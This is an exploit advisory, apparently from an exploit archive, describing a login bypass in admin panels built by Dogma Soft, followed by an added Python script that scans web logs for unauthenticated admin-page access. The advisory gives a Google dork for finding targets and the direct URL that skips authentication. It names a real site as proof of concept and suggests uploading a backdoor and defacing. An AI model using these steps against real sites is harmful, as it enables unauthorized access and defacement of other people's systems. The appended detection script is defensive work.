--------------------------------------------------------------------------------------------------------------
# Exploit Title: Direct login to admin panel without entering password
# Google Dork: ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd
# Date: 2015-08-25
# Exploit Author: Aaditya Purani
# Vendor Homepage: www.dogmaindia.com
# Software Link: No software link
# Version: Dogma Soft
# Tested on: Kali Linux/ Windows 7
# CVE : Critical Vulnerability
Hello,
This is Aaditya Purani, and I have found a critical bug in websites that have been designed by dogmaindia.
First, type the dork "ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd" into Google, without the double quotes (").
Then find a site that has "ITI Admin Panel | Powered by The Dogma Soft Pvt. Ltd" written in the footer.
Now, go to its admin page: http://www.targetsite.com/admin
After opening the admin panel, follow this link: http://www.targetsite.com/admin/home.php
And voila, you will be logged in to the admin panel directly, and you can also upload your backdoor and deface.
#POC:
Site: http://tirupatiitc.com/
Its admin panel : http://tirupatiitc.com/admin/
Directly login to admin panel : http://tirupatiitc.com/admin/home.php
Thank you
Contact me : https://securityresearchindia.wordpress.com
https://twitter.com/aaditya_purani
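
A defender-side check for the behaviour described above, as an added example that is not part of the original advisory: it scans a web access log for `/admin/*.php` pages served with status 200 to a client that never completed a login. The combined log format, the login endpoints in `LOGIN_PATHS`, the 302-on-success login, the page `/admin/students.php` and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumptions (not from the advisory): combined log format, and a login form
# that POSTs to one of these paths and answers 302 on success.
LOGIN_PATHS = {"/admin/", "/admin/index.php"}
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Aug/2015:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Aug/2015:10:00:09 +0000] "POST /admin/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [25/Aug/2015:10:00:10 +0000] "GET /admin/home.php HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
203.0.113.50 - - [25/Aug/2015:11:14:30 +0000] "GET /admin/ HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.50 - - [25/Aug/2015:11:14:41 +0000] "GET /admin/home.php HTTP/1.1" 200 8841 "-" "Mozilla/5.0"
203.0.113.50 - - [25/Aug/2015:11:15:02 +0000] "POST /admin/students.php?x=1 HTTP/1.1" 200 412 "-" "Mozilla/5.0"
192.0.2.33 - - [25/Aug/2015:12:01:00 +0000] "GET /admin/home.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

def find_unauthenticated_admin_hits(log_text):
    """Return {ip: [(timestamp, path), ...]} for 200 responses on /admin/*.php
    pages served to a client with no earlier successful login in the log."""
    logged_in = set()
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        ip, status = m["ip"], m["status"]
        path = m["path"].split("?", 1)[0].lower()  # drop query string
        if path in LOGIN_PATHS:
            if m["method"] == "POST" and status == "302":
                logged_in.add(ip)  # assumed marker of a successful login
            continue  # the login page itself is public
        # A page with a working session check would redirect (302) here.
        if (path.startswith("/admin/") and path.endswith(".php")
                and status == "200" and ip not in logged_in):
            findings[ip].append((m["ts"], path))
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in find_unauthenticated_admin_hits(SAMPLE_LOG).items():
        print(ip, hits)
```

Correlating by client IP is a heuristic: clients behind a shared NAT or a login that predates the log window will skew results, so treat hits as leads to confirm against session data.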